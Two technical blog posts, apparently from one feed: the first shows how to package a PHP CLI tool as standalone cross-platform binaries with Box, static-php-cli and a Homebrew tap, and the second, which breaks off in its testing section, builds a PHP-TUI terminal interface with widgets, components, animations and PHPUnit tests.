Edit (2026-03-26): added Distribution / Upgrade section.
TL;DR:
- Prepare app for prod environment: no dev deps, autoloading optimisation (classmap authoritative), making
.env.local.phpfrom.env, no debug symfony cache, etc- Compile the PHAR with Box
- Concatenate micro.sfx + dtk.phar into a self-contained binary with static-php-cli
I've been building DTK, a PHP CLI tool that automates the repetitive ceremony around the developer workflow: open ticket, create branch, open PR, merge, deploy - all wired together so you don't have to context-switch between your terminal, your Kanban board, and GitHub.
It's a Symfony Console app, it runs fine with php dtk,
but distributing it to teammates means they need PHP installed at the right version,
with the right extensions, plus Composer.
That's friction I'd rather not ask anyone to deal with.
Turns out, PHP can produce a single self-contained binary, no PHP required on the target machine. I learned this from a talk by Jean-François Lépine at Forum PHP 2025, PHP without PHP: Make Standalone Binaries from Your Code, which is in French, but here's an English recap of it.
Surprisingly easy to set up. Here's how.
Two tools do all the work.
Box packages a PHP project into a .phar archive.
A .phar is a self-contained PHP archive: it includes all your source files and vendor
dependencies, and PHP can execute it directly.
PHP Micro SFX, part of the static-php-cli (SPC) project,
is a minimal static PHP binary with no external dependencies.
It reads whatever binary data is appended to it and executes it as a .phar.
Combine the two:
micro.sfx + app.phar = standalone binary
One file. No PHP needed on the target machine. Drop it, run it.
Box reads a box.json config file and produces the archive.
Here's the one for DTK:
{
"$schema": "https://box-project.github.io/box/schema.json",
"main": "dtk",
"output": "build/dtk.phar",
"compression": "GZ",
"check-requirements": false,
"directories": [
"config",
"src",
"var/cache/prod",
"vendor"
],
"files": [
".env.local.php"
]
}
A few things worth noting:
"main": "dtk" is the entry point PHP file that Box will call when the PHAR is executed"compression": "GZ" compresses the archive contents, smaller file, same behaviour"check-requirements": false skips the PHP version and extension check at runtime,
since we know the bundled micro binary already has everything we needvar/cache/prod includes the pre-warmed Symfony cache,
so the binary doesn't need to write to the filesystem on first run.env.local.php is a compiled version of the environment variablesstatic-php-cli prebuilds micro SFX files for all major platforms and PHP versions, so you don't need to compile anything yourself.
In the DTK Dockerfile, I download them all at image build time:
RUN for PLATFORM in linux-x86_64 linux-aarch64 macos-x86_64 macos-aarch64; do \
curl -fsSL \
-o /tmp/micro.tar.gz \
"https://dl.static-php.dev/static-php-cli/common/php-${PHP_VERSION}-micro-${PLATFORM}.tar.gz" \
&& tar xzf /tmp/micro.tar.gz -C /usr/local/lib/ \
&& mv /usr/local/lib/micro.sfx "/usr/local/lib/micro-${PLATFORM}.sfx" \
&& rm /tmp/micro.tar.gz; \
done
Windows has a separate download (a zip, not a tarball), but same idea.
The micro SFX from static-php-cli includes a whole bunch of extensions,
so if you need some that are missing, or if you want the bare minimum, you'd need to compile
your own micro using SPC, that's more involved, but SPC has a doctor --auto-fix
command to help with the build environment setup.
With the PHAR built and the micro SFX files in place, combining them is a cat 😼:
cat micro-linux-x86_64.sfx dtk.phar > dtk-linux-x86_64
chmod +x dtk-linux-x86_64
That's it. The resulting file is a valid ELF binary (or Mach-O on macOS, PE on Windows) that carries its own PHP interpreter alongside the application code.
Here's the full build script I use for DTK (bin/mk-dtk-bin.sh) that does all of it:
#!/usr/bin/env bash
set -euo pipefail
# Restore dev dependencies once finished
trap 'composer install --optimize-autoloader --quiet' EXIT
echo ' // Installing prod dependencies...'
composer install --no-dev --classmap-authoritative --quiet
echo ' // Compiling environment variables...'
php bin/mk-dtk-bin/dump-env-prod.php
echo ' // Warming up Symfony cache...'
APP_ENV=prod APP_DEBUG=0 php bin/console cache:warmup --quiet
echo ' // Building PHAR...'
mkdir -p build
php -d phar.readonly=0 /usr/local/bin/box compile
echo ' // Assembling binaries...'
for _PLATFORM in linux-x86_64 linux-aarch64 macos-x86_64 macos-aarch64 windows-x86_64; do
case "${_PLATFORM}" in
windows-*) _EXT='.exe' ; _CHMOD=false ;;
*) _EXT='' ; _CHMOD=true ;;
esac
cat "/usr/local/lib/micro-${_PLATFORM}.sfx" build/dtk.phar > "build/dtk-${_PLATFORM}${_EXT}"
${_CHMOD} && chmod +x "build/dtk-${_PLATFORM}${_EXT}"
done
echo ' // Generating checksums...'
sha256sum \
build/dtk-linux-x86_64 \
build/dtk-linux-aarch64 \
build/dtk-macos-x86_64 \
build/dtk-macos-aarch64 \
build/dtk-windows-x86_64.exe \
> build/checksums.txt
echo ' [OK] Binaries built'
A few things the script does before building the PHAR:
composer install --no-dev --classmap-authoritative: strips dev dependencies
and generates a fast classmap-only autoloader, smaller archive, faster startup.dump-env-prod.php: compiles .env files into .env.local.php so the binary
doesn't need to parse .env files at runtime.
(Replicates what composer dump-env prod from symfony/flex does,
without requiring symfony/flex as a dependency.)cache:warmup: pre-generates the Symfony container so the binary
doesn't need write access to the filesystem on first run.The trap at the top restores dev dependencies when the script exits,
so the local dev environment is left intact after a build.
Running make app-bin in the Docker container produces:
build/dtk.phar
build/dtk-linux-x86_64
build/dtk-linux-aarch64
build/dtk-macos-x86_64
build/dtk-macos-aarch64
build/dtk-windows-x86_64.exe
build/checksums.txt
Five binaries, one per platform, from a single command, without leaving Docker. Each one runs without PHP on the target machine.
The binaries attach naturally to a GitHub release, alongside a checksums.txt
generated by sha256sum. Users can download the right binary for their platform
and verify the checksum.
That could cover the first install, but what about upgrades?
Note: In the PHP world, the "obvious" idea could be a
self-updatecommand: check the GitHub Releases API for a newer version, download the matching binary, replace the current executable. Tools likephp-cs-fixerdo this. It works, but it means implementing platform detection and handling the running-binary-can't-overwrite-itself problem on Windows. A reasonable amount of work for a modest gain.There's an easier way, and it's what most CLI tools already rely on: a package manager (e.g. homebrew).
A Homebrew tap gets you the same result
with none of that complexity, and it's the mechanism users already know and trust for CLI tools (e.g. fd, eza, tmux, etc).
A tap is just a GitHub repository (named homebrew-<something>) with a Ruby formula
that points at the release assets:
class Dtk < Formula
desc "Kanban, Git and Deployment, in one coherent flow"
homepage "https://github.com/ssc-php/dtk"
license "MIT"
version "0.1.0"
on_macos do
on_intel do
url "https://github.com/ssc-php/dtk/releases/download/v#{version}/dtk-macos-x86_64"
sha256 "3e44b1c8583b9f5cc140acbc43726de81fb8a151c0afc43e1152729c9a06213b"
end
on_arm do
url "https://github.com/ssc-php/dtk/releases/download/v#{version}/dtk-macos-aarch64"
sha256 "957953df74861df6cb8f975c4864f4495277c63cdd8b73fa20f9884dd2538ca0"
end
end
on_linux do
on_intel do
url "https://github.com/ssc-php/dtk/releases/download/v#{version}/dtk-linux-x86_64"
sha256 "4870846397532db7e513b39cabfd3b6fba426fbb3232190480ffc2368a51da27"
end
on_arm do
url "https://github.com/ssc-php/dtk/releases/download/v#{version}/dtk-linux-aarch64"
sha256 "e4674f606d96fcbf2fe80505d26a4f260ef27f488b5d0e56e5193f54a9ebd263"
end
end
def install
bin.install Dir["dtk-*"].first => "dtk"
end
test do
assert_match version.to_s, shell_output("#{bin}/dtk --version")
end
end
Users install once:
brew tap ssc-php/dtk
brew install dtk
And upgrade the same way as any other tool:
brew upgrade dtk
The formula file lives in the tap repo. On each release, update the version field
and the sha256 hashes, commit, push. The release script does this automatically.
This is real PHP, the same interpreter, the same extensions, the same behaviour. A few things to be aware of:
FFI is not available. Foreign Function Interface calls (PHP calling C libraries directly) don't work in static builds. For a CLI tool this is unlikely to matter.
Binary size. A minimal PHP binary with no extensions is around 3 MB. DTK, which only uses standard extensions, comes out much smaller than a full PHP install. Not Go-binary small, but perfectly acceptable for a CLI tool distributed via GitHub Releases.
Startup time. There's a small overhead compared to running php dtk directly:
PHAR extraction adds a few milliseconds, and the static build uses musl libc rather
than glibc, which is slightly slower.
For a developer tool where the user is waiting hundreds of milliseconds anyway, this doesn't matter.
Not for web apps. This is for CLI / TUI / scripts, for web PHP apps, use FrankenPHP instead. It's a production-proven PHP app server built on top of static-php-cli that handles all the complexity, and it ships as a standalone binary too.
The whole thing (Box config, Dockerfile setup, build script) took an afternoon.
Most of that time was reading the static-php-cli docs and figuring out the Docker layering.
The actual concatenation step (cat micro.sfx app.phar > binary) was the part that surprised me most:
something that powerful should not be that simple :D !
If you're building a PHP CLI tool meant to be distributed to people who shouldn't need to care about PHP, this is the approach. It works, it's well-supported (FrankenPHP, Laravel Herd, and NativePHP all use static-php-cli under the hood), and the tooling is solid.
If you want to see a real-world example of a PHP project that compiles its own micro binaries (including the SPC setup), look at Castor. Castor is a task runner / script launcher for PHP (think Make or Taskfile, but in PHP) and it ships prebuilt binaries for all platforms. Its build setup is a good reference for when you outgrow the prebuilt micro SFX files and need to compile your own with a custom extension set.
The full DTK source used in this article is available at github.com/ssc-php/dtk/tree/v0.1.0. The Homebrew tap code added in the edit is in commit 129e26a. The Homebrew tap itself is at github.com/ssc-php/homebrew-dtk/commit/daa6aa1.
]]>In the previous article, we built Qalin: BisouLand's Test Control Interface, a dedicated Symfony app that lets anyone on the team reach any game state on demand, without touching production code.
Qalin already has three interfaces: CLI, API, and a Web UI.
After using it for a bit, I realised to my utter dismay that I somehow preferred using the Web UI, instead of the CLI one as I'd expect 🙀. I live in the terminal, using a Web UI or GUI is unacceptable, so let's fix that by...
Introducing a TUI (Terminal User Interface). In today's article, we'll build one with PHP-TUI.

Did you notice the animated banner when switching to new screen or submitting the forms? Nice!
PHP-TUI is a PHP port of Ratatui, the popular Rust TUI library.
It gives you a retained-mode widget system, a layout engine based on constraints, and a terminal backend: all the building blocks to draw full-screen interactive applications directly in your terminal.
The core loop is straightforward:
No browser, no HTTP server, no JavaScript framework. Just your terminal, a render loop, and widgets.
PHP-TUI is powerful precisely because it stays out of your way: it doesn't come with any opinionated defaults or conventions about how to structure an application. It gives you widgets, a layout engine, and a terminal backend, and leaves everything else to you.
But that means it can be quite daunting to build your own application with it, especially since there are (at the time of writing) not a lot of resources about it.
Most of what follows, the Screen interface, the Action navigation model,
the Component abstraction, the Form system, the custom widgets, are things I designed myself,
loosely inspired by my partial understanding of how Ratatui applications are structured.
Take them as one possible approach, not as the official way to use PHP-TUI.
Let's walk through it.
QalinTui is the entry point. It sets up the terminal, registers widget renderers,
and runs the event/render loop:
public function run(): void
{
$terminal = Terminal::new();
$backend = PhpTermBackend::new($terminal);
$display = DisplayBuilder::default($backend)
->addWidgetRenderer(new LayoutWidgetRenderer())
->addWidgetRenderer(new BannerWidgetRenderer())
->addWidgetRenderer(new FormWidgetRenderer())
->addWidgetRenderer(new KeyHintsWidgetRenderer())
// ... more custom renderers
->fullscreen()
->build()
;
try {
$terminal->execute(Actions::cursorHide());
$terminal->execute(Actions::alternateScreenEnable());
$terminal->enableRawMode();
while (true) {
// Drain all queued events before redrawing
while ($event = $terminal->events()->next()) {
$action = $this->handle($event);
if ($action instanceof Quit) {
return;
}
}
$display->draw($this->activeScreen->build());
usleep(50_000); // 50 ms
}
} finally {
$terminal->disableRawMode();
$terminal->execute(Actions::alternateScreenDisable());
$terminal->execute(Actions::cursorShow());
}
}
Three terminal setup calls worth knowing:
alternateScreenEnable() switches to a blank buffer, so closing the TUI restores the
terminal exactly as it was beforeenableRawMode() disables the default echo and buffering behaviours, so keypresses go
directly to the application instead of being processed by the shellcursorHide() removes the blinking cursor from the TUI surfaceThe finally block ensures all three are reversed on exit, whether the app quits normally
or throws.
The inner loop drains all queued events before each redraw. This avoids redundant renders when multiple events arrive within the same 50 ms window.
🐘 PHP-TUI:
DisplayBuilder::default()is the entry point for constructing a display.addWidgetRenderer()registers custom renderers alongside the built-in ones.fullscreen()sizes the surface to the terminal dimensions.build()returns the display ready for use.
The application is structured around screens.
Each screen is a full-page view with three responsibilities:
interface Screen
{
// Unique display name (shown in menus, titles, etc.)
public function name(): string;
// Renders current state as a Widget tree for this frame
public function build(): Widget;
// Processes an input event and signals what should happen next
public function handle(Event $event): Action;
}
handle() returns one of three Action types:
Stay: the event was handled internally, stay on this screenNavigate(ScreenClass::class): transition to another screenQuit: exit the TUIQalinTui owns all registered screens and a pointer to the active one.
When handle() returns Navigate, it updates the active screen pointer and returns
Stay to the loop:
public function handle(Event $event): Action
{
$action = $this->activeScreen->handle($event);
if ($action instanceof Navigate) {
$this->activeScreen = $this->screens[$action->screen] ?? $this->activeScreen;
return new Stay();
}
return $action;
}
Screens are registered via Symfony's #[AutowireIterator] by DI tag, so adding a new
screen is a matter of implementing Screen and tagging it, no wiring by hand.
HomeScreen is the entry point. It shows a tab-split choice input
of available actions and scenarios.

The choice input combines a fuzzy-find filter and a navigable list in a single component,
ChoiceFieldComponent. The screen passes it the screen names for the active tab and
delegates all filtering and navigation to it.
build() is straightforward:
public function build(): Widget
{
return LayoutWidget::from(
$this->qalinAnimatedBanner->widget(),
$this->tabs->build(), // hotkey tab bar: "1 Actions / 2 Scenarios"
$this->choiceInput->build(), // fuzzy-find filter + navigable list
KeyHintsWidget::from(['Next' => 'Tab', 'Select' => 'Enter', 'Quit' => 'Esc']),
);
}
ChoiceFieldComponent::build() returns a single widget that renders both the filter
input and the list, so the screen body is just $this->choiceInput->build(): no
manual GridWidget, no ListWidget, no cursor tracking.
The handle() method uses PHP's match to dispatch on event type and key code:
public function handle(Event $event): Action
{
return match (true) {
$event instanceof CodedKeyEvent => match ($event->code) {
KeyCode::Esc => new Quit(),
KeyCode::Tab, KeyCode::Down => $this->handleChoiceInput(CodedKeyEvent::new(KeyCode::Down)),
KeyCode::BackTab, KeyCode::Up => $this->handleChoiceInput(CodedKeyEvent::new(KeyCode::Up)),
KeyCode::Enter => $this->selectCurrentScreen(),
default => $this->handleChoiceInput($event),
},
$event instanceof CharKeyEvent => match ($this->tabs->handle($event)) {
ComponentState::Changed => $this->resetChoiceInput(),
ComponentState::Handled => new Stay(),
ComponentState::Ignored, ComponentState::Submitted => $this->handleChoiceInput($event),
},
default => new Stay(),
};
}
Tab hotkeys (1 for Actions, 2 for Scenarios) are tried first for every character
event. If the character is not a hotkey, it is forwarded to ChoiceFieldComponent,
which appends it to the filter. Switching tabs resets the choice input for the new tab's
screen list.
Each Qalin action has its own screen. They all follow the same pattern: a form on the left, the API response on the right.

Here is UpgradeInstantlyForFreeScreen:
public function __construct(
private readonly HttpClientInterface $qalinHttpClient,
private readonly QalinAnimatedBanner $qalinAnimatedBanner,
) {
$this->form = FormComponent::fromFields(
InputFieldComponent::fromLabel('Username'),
ChoiceFieldComponent::fromLabelAndChoices('Upgradable', array_map(
static fn (Upgradable $u): string => $u->value,
Upgradable::cases(),
)),
InputFieldComponent::fromLabel('Levels')->withValue('1'),
SubmitFieldComponent::fromLabel('Upgrade'),
);
}
public function build(): Widget
{
return LayoutWidget::from(
$this->qalinAnimatedBanner->widget(),
ConstrainedWidget::wrap(
ParagraphWidget::fromLines(Line::fromSpans(
Span::styled('Action: UpgradeInstantlyForFree', Style::default()
->fg(AnsiColor::Yellow)
->addModifier(Modifier::BOLD)),
)),
Constraint::length(3),
),
GridWidget::default()
->direction(Direction::Horizontal)
->constraints(
Constraint::percentage(50),
Constraint::percentage(50),
)
->widgets(
$this->form->build(),
BlockWidget::default()
->borders(Borders::ALL)
->borderType(BorderType::Rounded)
->titles(Title::fromString('Result'))
->widget(KeyValueWidget::fromRows($this->result ?? [])),
),
KeyHintsWidget::from(['Next' => 'Tab', 'Submit' => 'Enter', 'Back' => 'Esc']),
);
}
public function handle(Event $event): Action
{
if ($event instanceof CodedKeyEvent && KeyCode::Esc === $event->code) {
$this->qalinAnimatedBanner->animate();
return new Navigate(HomeScreen::class);
}
if (ComponentState::Submitted !== $this->form->handle($event)) {
return new Stay();
}
$this->qalinAnimatedBanner->animate();
$response = $this->qalinHttpClient->request('POST', 'api/v1/actions/upgrade-instantly-for-free', [
'json' => [
'username' => $this->form->getValues()['Username'],
'upgradable' => $this->form->getValues()['Upgradable'],
'levels' => (int) $this->form->getValues()['Levels'],
],
]);
$this->result = $response->toArray(false);
return new Stay();
}
The FormComponent manages tab-cycling between fields and signals ComponentState::Submitted
when the submit button is pressed. The screen delegates all form events to it and only
reacts to the Submitted state: it does not need to know which field is focused or
how the cursor moves.
PHP-TUI ships a set of built-in widgets (Paragraph, Grid, Block, List, etc.). For anything that needs different composition or reuse, you create a custom widget.
A custom widget is two classes:
HotkeyTabsWidget renders a tab bar like [1] Actions | [2] Scenarios.
The data class holds the tabs map, the focused hotkey, and three style properties:
final readonly class HotkeyTabsWidget implements Widget, Constrained
{
/** @param non-empty-array<array-key, string> $hotkeyTabs hotkey => label */
private function __construct(
public array $hotkeyTabs,
public string $focusedHotkey,
public Style $hotkeyStyle,
public Style $focusedLabelStyle,
public Style $unfocusedLabelsStyle,
) {
}
/** @param array<array-key, string> $tabs hotkey => label */
public static function fromTabs(array $tabs): self
{
if ([] === $tabs) {
throw ValidationFailedException::make(
'Invalid "HotkeyTabsWidget" parameter: tabs should not be empty (`[]` given)',
);
}
foreach (array_keys($tabs) as $hotkey) {
if (1 !== mb_strlen((string) $hotkey)) {
throw ValidationFailedException::make(
"Invalid \"HotkeyTabsWidget\" parameter: tab hotkey should be a single character (`{$hotkey}` given)",
);
}
}
return new self(
$tabs,
(string) array_key_first($tabs),
Style::default()->fg(AnsiColor::Blue)->addModifier(Modifier::BOLD),
Style::default()->fg(AnsiColor::Yellow)->addModifier(Modifier::BOLD),
Style::default()->fg(AnsiColor::DarkGray),
);
}
public function focus(string $hotkey): self
{
if (!\array_key_exists($hotkey, $this->hotkeyTabs)) {
throw ValidationFailedException::make(
"Invalid \"HotkeyTabsWidget\" parameter: focusedHotkey should match an existing tab hotkey (`{$hotkey}` given)",
);
}
return new self(
$this->hotkeyTabs,
$hotkey,
$this->hotkeyStyle,
$this->focusedLabelStyle,
$this->unfocusedLabelsStyle,
);
}
public function constraint(): LengthConstraint
{
return Constraint::length(3);
}
// hotkeyStyle(), focusedLabelStyle(), unfocusedLabelsStyle() withers omitted for brevity
}
The widget is immutable: focus() returns a new instance rather than mutating state.
constraint() is part of the Constrained interface, which lets the layout system
ask the widget how much space it needs (3 rows: 1 content + 2 border).
The renderer builds the [1] Actions | [2] Scenarios line from Span elements,
applying the focused or unfocused label style depending on which hotkey is active:
final class HotkeyTabsWidgetRenderer implements WidgetRenderer
{
public function render(
WidgetRenderer $renderer,
Widget $widget,
Buffer $buffer,
Area $area,
): void {
if (!$widget instanceof HotkeyTabsWidget) {
return;
}
$spans = [];
$isFirstTab = true;
foreach ($widget->hotkeyTabs as $key => $label) {
$hotkey = (string) $key;
$label = (string) $label;
if (!$isFirstTab) {
$spans[] = Span::styled(' | ', $widget->unfocusedLabelsStyle);
}
$isFirstTab = false;
$spans[] = Span::styled('[', $widget->unfocusedLabelsStyle);
$spans[] = Span::styled($hotkey, $widget->hotkeyStyle);
$spans[] = Span::styled('' !== $label ? '] ' : ']', $widget->unfocusedLabelsStyle);
$spans[] = Span::styled(
$label,
$hotkey === $widget->focusedHotkey
? $widget->focusedLabelStyle
: $widget->unfocusedLabelsStyle,
);
}
$renderer->render(
$renderer,
ParagraphWidget::fromLines(Line::fromSpans(...$spans)),
$buffer,
$area,
);
}
}
The renderer receives the Area (width and height of the allocated space) and the
Buffer (the mutable character grid for this frame). It does not write to the buffer
directly: it delegates to a built-in widget via $renderer->render().
That is the common pattern: assemble standard widgets from the widget's data, then
pass rendering back to the framework.
🐘 PHP-TUI: register custom renderers with
DisplayBuilder::addWidgetRenderer(). Renderers are checked in order; the first one that recognises the widget class wins. TheWidgetRenderer $rendererparameter passed torender()is the full chain, so delegating to built-in widgets is just$renderer->render($renderer, $childWidget, $buffer, $area).
A component wraps a widget with mutable state and event handling. Where a widget is pure data built fresh each frame, a component lives across frames and tracks what has changed.
HotkeyTabsComponent wraps HotkeyTabsWidget and adds focus state and event handling.
It is generic over HotkeyTab, an interface with two methods:
interface HotkeyTab
{
public function key(): string; // single character, e.g. '1'
public function label(): string; // display name, e.g. 'Actions'
}
Any backed enum implementing HotkeyTab can be used as a tab set.
HomeTab is the one used by HomeScreen:
enum HomeTab: string implements HotkeyTab
{
case Actions = 'Actions';
case Scenarios = 'Scenarios';
public function key(): string
{
return match ($this) {
self::Actions => '1',
self::Scenarios => '2',
};
}
public function label(): string { return $this->value; }
}
The component itself:
/** @template TTab of HotkeyTab */
final class HotkeyTabsComponent implements Component
{
private int $focusedIndex = 0;
/** @param non-empty-list<TTab> $tabs */
private function __construct(private readonly array $tabs) {}
/** @return self<TTab> */
public static function fromTabs(array $tabs): self
{
return new self($tabs);
}
public function handle(Event $event): ComponentState
{
if (!$event instanceof CharKeyEvent) {
return ComponentState::Ignored;
}
foreach ($this->tabs as $index => $tab) {
if ($event->char === $tab->key()) {
if ($index === $this->focusedIndex) {
return ComponentState::Handled;
}
$this->focusedIndex = $index;
return ComponentState::Changed;
}
}
return ComponentState::Ignored;
}
public function build(): HotkeyTabsWidget
{
$tabs = [];
foreach ($this->tabs as $tab) {
$tabs[$tab->key()] = $tab->label();
}
return HotkeyTabsWidget::fromTabs($tabs)
->focus($this->tabs[$this->focusedIndex]->key());
}
/** @return TTab */
public function isFocused(): mixed
{
return $this->tabs[$this->focusedIndex];
}
}
handle() returns ComponentState::Changed when the focused tab changes, Handled
when the same tab's hotkey is pressed again, and Ignored for anything else.
The screen uses that distinction to decide whether to reset dependent state (e.g. the
choice input) or simply stay put.
build() snapshots the current focus into a fresh HotkeyTabsWidget each frame.
The widget has no memory of previous frames; the component does.
The Qalin banner is animated. When the user navigates between screens, it plays a short animation: either a Beat (the logo contracts and shifts to magenta) or Sparkles (sparkle characters appear on the logo).
Both implement the same Animation interface:
interface Animation
{
public function animate(): void;
public function logo(): array;
public function logoStyle(): Style;
}
Beat is time-based. It stores the moment animate() was called, then
isBeating() derives the current state from elapsed time:
final class Beat implements Animation
{
private const BEAT_ON_SECONDS = 0.15;
private const BEAT_OFF_SECONDS = 0.1;
private const BEAT_COUNT = 2;
private ?float $beatStartedAt = null;
public function animate(): void
{
$this->beatStartedAt = $this->now();
}
public function logo(): array
{
return $this->isBeating() ? self::CONTRACTED_LOGO : QalinBanner::LOGO;
}
public function logoStyle(): Style
{
return $this->isBeating()
? Style::default()->fg(AnsiColor::Magenta)
: Style::default()->fg(AnsiColor::Red);
}
private function isBeating(): bool
{
if (null === $this->beatStartedAt) {
return false;
}
$elapsed = $this->now() - $this->beatStartedAt;
$cycleSeconds = self::BEAT_ON_SECONDS + self::BEAT_OFF_SECONDS;
$totalSeconds = self::BEAT_COUNT * $cycleSeconds;
if ($elapsed >= $totalSeconds) {
$this->beatStartedAt = null;
return false;
}
return fmod($elapsed, $cycleSeconds) < self::BEAT_ON_SECONDS;
}
private function now(): float
{
return (float) $this->clock->now()->format('U.u');
}
}
The animation has no state machine, no scheduler, no timer callback.
logo() and logoStyle() are called every frame (every 50 ms);
they read the clock, compute where we are in the animation, and return the right data.
When the animation is over, beatStartedAt is reset to null.
QalinAnimatedBanner wraps the animations and exposes a single widget() method
for screens to use:
final class QalinAnimatedBanner
{
public function animate(): void
{
$this->currentAnimation = $this->pickRandomAnimation();
$this->currentAnimation->animate();
}
public function widget(): BannerWidget
{
$logo = $this->currentAnimation?->logo() ?? QalinBanner::LOGO;
$logoStyle = $this->currentAnimation?->logoStyle() ?? Style::default()->fg(AnsiColor::Red);
return QalinBanner::widgetWithLogo($logo, $logoStyle);
}
}
Screens call $this->qalinAnimatedBanner->animate() on navigation events (entering and
leaving a screen), then let widget() return whatever frame the animation is currently on.
🎶 Symfony Clock:
ClockInterfacefromsymfony/clocklets the animation read the current time without coupling totime()ormicrotime(). In tests, swap in aMockClockand control time explicitly. For a feature as simple as a cosmetic animation the test value is low, but the approach scales cleanly to anything time-sensitive.
Testing a TUI application might sound tricky, but the architecture makes it straightforward. There are three levels.
Widgets and components are plain PHP classes with no terminal dependency. Testing them is just instantiating, calling methods, and asserting state.
HotkeyTabsWidgetTest covers construction, validation, focus switching, and styles:
/** @param array<array-key, string> $tabs */
#[DataProvider('tabsProvider')]
#[TestDox('It has hotkeyTabs: $scenario')]
public function test_it_has_hotkey_tabs(string $scenario, array $tabs): void
{
$tabsWidget = HotkeyTabsWidget::fromTabs($tabs);
$this->assertSame($tabs, $tabsWidget->hotkeyTabs);
}
public static function tabsProvider(): \Generator
{
yield [
'scenario' => "one as `['1' => 'TabA']` (`[hotkey => label]`)",
'tabs' => ['1' => 'TabA'],
];
yield [
'scenario' => "many as `['1' => 'TabA', '2' => 'TabB', '3' => 'TabC']` (`[hotkey => label]`)",
'tabs' => ['1' => 'TabA', '2' => 'TabB', '3' => 'TabC'],
];
}
/** @param array<array-key, string> $tabs */
#[DataProvider('invalidTabsProvider')]
#[TestDox('It fails when $scenario')]
public function test_it_fails_with_invalid_tabs(string $scenario, array $tabs): void
{
$this->expectException(ValidationFailedException::class);
HotkeyTabsWidget::fromTabs($tabs);
}
public static function invalidTabsProvider(): \Generator
{
yield [
'scenario' => 'hotkeyTabs is empty (`[]` given)',
'tabs' => [],
];
yield [
'scenario' => "hotkey is more than one character (`['ab' => 'TabA']` given)",
'tabs' => ['ab' => 'TabA'],
];
}
make phpunit arg='--testdox --order-by=default --filter HotkeyTabsWidgetTest'
Hotkey Tabs Widget (Bl\Qa\Tests\Qalin\Spec\Infrastructure\PhpTui\Component\HotkeyTab\HotkeyTabsWidget)
✔ It has hotkeyTabs: one as `['1' => 'TabA']` (`[hotkey => label]`)
✔ It has hotkeyTabs: many as `['1' => 'TabA', '2' => 'TabB', '3' => 'TabC']` (`[hotkey => label]`)
✔ It has hotkeyTabs: with empty label (e.g. `['1' => '']`)
✔ It has constraint (e.g. Constraint::length(3): 1 content row + 2 border rows)
✔ It fails when hotkeyTabs is empty (`[]` given)
✔ It fails when hotkey is missing (`['TabA']` given)
✔ It fails when hotkey is empty (`['' => 'TabA']` given)
✔ It fails when hotkey is more than one character (`['ab' => 'TabA']` given)
✔ It has focusedHotkey: first one by default (e.g. `1` for `TabA`)
✔ It has focusedHotkey: can switch to another one (e.g. `focus('2')` for `TabB`)
✔ It fails when focusing on non existing hotkey (e.g. `focus('4')`)
✔ It has default style: hotkey in blue bold
✔ It has default style: focusedLabel in yellow bold
✔ It has default style: unfocusedLabels in dark gray
✔ It can customize style: hotkey
✔ It can customize style: focusedLabel
✔ It can customize style: unfocusedLabels
HotkeyTabsComponentTest covers event handling and the build() snapshot:
#[TestDox("It reports ComponentState::Changed when pressing another tab's hotkey")]
public function test_it_reports_changed_when_pressing_another_tabs_hotkey(): void
{
$tabs = HotkeyTabsComponent::fromTabs(HotkeyFixtureTab::cases());
$tab = HotkeyFixtureTab::TabB;
$componentState = $tabs->handle(CharKeyEvent::new($tab->key()));
$this->assertSame(ComponentState::Changed, $componentState);
$this->assertSame($tab, $tabs->isFocused());
}
#[DataProvider('ignoredEventsProvider')]
#[TestDox('It reports ComponentState::Ignored when $scenario')]
public function test_it_reports_ignored(string $scenario, Event $event): void
{
$tabs = HotkeyTabsComponent::fromTabs(HotkeyFixtureTab::cases());
$componentState = $tabs->handle($event);
$this->assertSame(ComponentState::Ignored, $componentState);
$this->assertSame(HotkeyFixtureTab::TabA, $tabs->isFocused());
}
public static function ignoredEventsProvider(): \Generator
{
yield [
'scenario' => 'pressing an unregistered hotkey',
'event' => CharKeyEvent::new('x'),
];
yield [
'scenario' => 'receiving a non CharKeyEvent (e.g. KeyCode::Tab)',
'event' => CodedKeyEvent::new(KeyCode::Tab),
];
}
make phpunit arg='--testdox --order-by=default --filter HotkeyTabsComponentTest'
Hotkey Tabs Component (Bl\Qa\Tests\Qalin\Spec\Infrastructure\PhpTui\Component\HotkeyTab\HotkeyTabsComponent)
✔ It builds HotkeyTabsWidget snapshotting current tabs and focused hotkey
✔ It reports ComponentState::Changed when pressing another tab's hotkey
✔ It reports ComponentState::Handled when pressing the focused tab's hotkey
✔ It reports ComponentState::Ignored when pressing an unregistered hotkey
✔ It reports ComponentState::Ignored when receiving a non CharKeyEvent (e.g. KeyCode::Tab)
No mocks. No test doubles. Just events and assertions.
Beat uses ClockInterface, so MockClock from symfony/clock lets us freeze and
advance time to land on any frame.
Each frame test is parameterised with a data provider that yields one timing entry and
one entry per logo line. #[TestDox] interpolates $scenario from the provider to
produce a descriptive name for each case:
#[DataProvider('frame1Provider')]
#[TestDox('It renders frame 1: $scenario')]
public function test_it_renders_logo_frame_1(
string $scenario,
int $index,
string $line,
): void {
$mockClock = new MockClock('2024-01-01 00:00:00');
$beat = new Beat($mockClock);
$beat->animate();
$this->assertSame($line, $beat->logo()[$index]);
$this->assertEquals(Style::default()->fg(AnsiColor::Magenta), $beat->logoStyle());
}
public static function frame1Provider(): \Generator
{
$lines = Beat::CONTRACTED_LOGO;
yield [
'scenario' => 'at t=0s: contracted logo, in magenta',
'index' => 0,
'line' => $lines[0],
];
foreach ($lines as $index => $line) {
yield [
'scenario' => "`{$line}`",
'index' => $index,
'line' => $line,
];
}
}
make phpunit arg='--testdox --order-by=default --filter BeatTest'
Beat (Bl\Qa\Tests\Qalin\Spec\UserInterface\Tui\QalinAnimatedBanner\Beat)
✔ It renders frame 0: before animate(): default logo, in red
✔ It renders frame 0: ` ████ ████ `
✔ It renders frame 0: `████████ ████████`
✔ It renders frame 0: `██████████████████`
✔ It renders frame 0: `██████████████████`
✔ It renders frame 0: ` ████████████ `
✔ It renders frame 0: ` ██████ `
✔ It renders frame 1: at t=0s: contracted logo, in magenta
✔ It renders frame 1: ` `
✔ It renders frame 1: ` ████ ████ `
✔ It renders frame 1: ` ████████████ `
✔ It renders frame 1: ` ████████ `
✔ It renders frame 1: ` ████ `
✔ It renders frame 1: ` `
✔ It renders frame 2: at t=0.151s: default logo, in red
...
✔ It renders frame 4: at t=1.0s: default logo, in red
...
Each line of the logo is asserted individually. If the contracted logo shifts a pixel, the failing test name tells you exactly which line broke and at which frame.
Screen tests exercise the full Symfony container and real HTTP client. They drive the screen by sending the same events a user would: character keys, tab presses, enter.
Required and invalid input cases are covered with data providers:
#[DataProvider('invalidInputProvider')]
